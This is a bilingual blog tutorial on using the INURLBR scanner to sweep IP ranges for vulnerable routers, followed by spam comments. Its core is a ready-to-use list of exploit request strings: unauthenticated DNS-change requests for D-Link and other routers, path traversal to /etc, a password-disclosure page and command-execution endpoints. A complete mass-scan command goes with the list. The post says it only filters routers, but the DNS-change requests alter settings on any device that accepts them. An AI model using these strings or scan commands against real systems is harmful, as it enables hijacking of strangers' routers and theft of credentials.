segunda-feira, 20 de julho de 2015

INURLBR searching for routers

In this short article we will use the INURLBR tool for searching routers in certain ip ranges. 

The tool has methods that generate IP ranges or X amount of ip random. Separated several exploits routers, so we can use the method of INURLBR tool called SUB_PROCESS SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido.  Download tool INURLBR: https://github.com/googleinurl/SCANNER-INURLBR  SUB_PROCESS - consists of a series of concatenate strings on the basis of a predefined file. With concatenation process made the tool sends the request against its target to make possible the validation.  We will use methods get and validate if the request was successfully executed retonando code 200. There will be no exploitation, let's just filtering routers.  Creating SUB_PROCESS file First we must create our file with the exploration of strings that will be used by SUB_PROCESS Primeiro devemos criar nosso arquivo com as strings de exploração que serão usadas pelo SUB_PROCESS.

The tool has methods that generate IP ranges or X amount of ip random.
Separated several exploits routers, so we can use the method of INURLBR tool called SUB_PROCESS
SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido.

Download tool INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR

SUB_PROCESS - consists of a series of concatenate strings on the basis of a predefined file. With concatenation process made the tool sends the request against its target to make possible the validation.

We will use methods get and validate if the request was successfully executed retonando code 200.
There will be no exploitation, let's just filtering routers.

Creating SUB_PROCESS file
First we must create our file with the exploration of strings that will be used by SUB_PROCESS
Primeiro devemos criar nosso arquivo com as strings de exploração que serão usadas pelo SUB_PROCESS.

File content:
/dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
/dvr/wwwroot/user.cgi
/web_cgi.cgi?&request=UploadFile&path=/etc/
/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1
/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=$3
/html/tUserAccountControl.htm
/common/info.cgi
/hedwig.cgi
/tools_admin.asp
/hnap.cgi
/scdmz.cmd?&fwFlag=50853375&dosenbl=1
/cliget.cgi?cmd=help
/scgi-bin/platform.cgi
/soap.cgi
/dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc
/command.php
/authentication.cgi

Each line of the file will be concatenated with the IP target thus effecting request testing to validate that return code http.
Cada linha do arquivo será concatenada com o alvo IP assim efetuando teste de request para validar se retorno do código http.

Example:
http://TARGET/{STRING_SUB_PROCESS}

http://200.16.3.***/dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1/dns_1?
http://200.16.3.***/tools_admin.asp

If the HTTP server return code 200 means that such a request has been successfully performed.
Se o código http do servidor retornar 200 significa que tal requisição foi efetuada com sucesso.

if(HTTP_CODE == 200){

VULN

}
Now let's create our command to run the tool INURLBR.
By setting command:

SET RANGE IP:
RANGE IP:
 --range Set range IP.
      Example: --range {range_start,rage_end}
      Usage:   --range '172.16.0.5,172.16.0.255'

OR

RANGE IP RANDOM:
 --range-rand Set amount of random ips.
      Example: --range-rand {rand}
      Usage:   --range-rand '50'

SET FILE OUTPUT:
-s vuln.txt

SET FILE SUB_PROCESS:
--sub-file  Subprocess performs an injection 
     strings in URLs found by the engine, via GET or POST.
     Example: --sub-file {youfile}
     Usage:   --sub-file exploits_get.txt

SET TYPE OF REQUEST -  SUB_PROCESS:
 --sub-get defines whether the strings coming from 
     --sub-file will be injected via GET.
     Usage:   --sub-get

SET VALIDATION HTTP CODE:
 --ifcode Valid results based on your return http code.
      Example: --ifcode {ifcode}
      Usage:   --ifcode 200

SET TIME-OUT:
 --time-out Timeout to exit the process.
      Example: --time-out {second}
      Usage:   --time-out 3

COMPLETE COMMAND:
php inurlbr.php --range '172.1.0.1,172.1.0.163' -s vuln.txt  --sub-file 'string_exploits.txt' --sub-get --ifcode 200

print output:
COMPLETE COMMAND: php inurlbr.php --range '172.1.0.1,172.1.0.163' -s vuln.txt  --sub-file 'string_exploits.txt' --sub-get --ifcode 200  print output:

Strings exploits used:

All exploits cited already have packages fix.

Exploit_model: Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
http://www.exploit-db.com/exploits/35995/

Exploit_model: D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
STRING GET: /dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
http://www.exploit-db.com/exploits/35917/

Exploit_model: D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
STRING GET: /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
http://1337day.com/exploit/23302/

Exploit_model: LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit
STRING GET: /dvr/wwwroot/user.cgi
http://www.exploit-db.com/exploits/36014/

Exploit_model: D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities
STRING GET: /web_cgi.cgi?&request=UploadFile&path=/etc/
https://www.exploit-db.com/exploits/37454/

Exploit_model: D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1
https://www.exploit-db.com/exploits/37237/

Exploit_model: D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change
STRING GET: /dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
https://www.exploit-db.com/exploits/37240/

Exploit_model: D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
https://www.exploit-db.com/exploits/37241/

Exploit_model: D-Link DSL-2640B - Unauthenticated Remote DNS Change Exploit
STRING GET: /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
https://www.exploit-db.com/exploits/36105/

Exploit_model: D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit
STRING GET: /Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
https://www.exploit-db.com/exploits/35917/

Exploit_model: D-Link AP 3200 - Multiple Vulnerabilities
STRING GET: /html/tUserAccountControl.htm
https://www.exploit-db.com/exploits/34206/

Exploit_model: D-Link info.cgi POST Request Buffer Overflow
STRING GET: /common/info.cgi
https://www.exploit-db.com/exploits/34063/

Exploit_model: D-Link hedwig.cgi Buffer Overflow in Cookie Header
STRING GET: /hedwig.cgi
https://www.exploit-db.com/exploits/33863/

Exploit_model: DGL-5500, DIR-855L and the DIR-835:
STRING GET: /tools_admin.asp
https://www.exploit-db.com/exploits/33520/

Exploit_model: D-Link models DGL-5500, DIR-855L, DIR-835 suffer
STRING GET: /hnap.cgi
https://www.exploit-db.com/exploits/33520/

Exploit_model: D-Link DSL-2750B ADSL Router - CSRF Vulnerability
STRING GET: /scdmz.cmd?&fwFlag=50853375&dosenbl=1
https://www.exploit-db.com/exploits/31569/

Exploit_model: D-Link DIR-100 - Multiple Vulnerabilities
STRING GET: /cliget.cgi?cmd=help
https://www.exploit-db.com/exploits/31425/

Exploit_model: D-Link DSR Router Series - Remote Root Shell Exploit
STRING GET: /scgi-bin/platform.cgi
https://www.exploit-db.com/exploits/30062/

Exploit_model: D-Link Devices UPnP SOAP Telnetd Command Execution
STRING GET: /soap.cgi
https://www.exploit-db.com/exploits/28333/

Exploit_model: D-Link DIR-505 1.06 - Multiple Vulnerabilities
STRING GET: /dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc
https://www.exploit-db.com/exploits/28184/

Exploit_model: D-Link Devices Unauthenticated Remote Command Execution
STRING GET: /command.php
https://www.exploit-db.com/exploits/27528/

Exploit_model: D-Link DIR-645 1.03B08 - Multiple Vulnerabilities
STRING GET: /authentication.cgi
https://www.exploit-db.com/exploits/27283/

7 comentários:

  1. Este comentário foi removido por um administrador do blog.

    ResponderExcluir
  2. Great article with excellent idea! I appreciate your post.


    Pranav Engineering

    ResponderExcluir
  3. Great article with excellent idea! I appreciate your post.


    Compress Part

    ResponderExcluir
  4. Great article with excellent idea! I appreciate your post.


    Compress Part

    ResponderExcluir
  5. your articel is very nice! I appreciate your post.


    India Tours Services

    ResponderExcluir
  6. Excellent idea and I appreciate your post.

    ResponderExcluir
  7. It's a great pleasure reading your post.It's full of information I am looking for and I love to post a comment that "The content of your post is awesome" Great work!.

    ResponderExcluir

............